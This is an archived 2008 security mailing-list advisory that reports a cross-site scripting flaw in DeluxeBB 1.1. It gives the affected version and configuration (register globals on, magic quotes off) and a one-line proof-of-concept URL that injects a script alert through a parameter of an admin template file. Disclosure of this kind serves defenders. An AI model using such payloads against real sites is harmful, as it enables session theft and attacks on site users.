OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
DeluxeBB 1.1 XSS Vulnerabilitie

nbbngmx.net
Date: Tue Jan 22 2008 - 11:07:53 CST


########################################################
#Founded: 21, January 2008
#Autor: NBBN
#Type: XSS
#DeluxeBB Version: 1.1
#Register Globals: ON
#Magic Quotes; OFF
########################################################

poc:

http://www.site.tld/path/templates/default/admincp/attachments_header.php?lang_listofmatches=<script>alert("XSS")</script>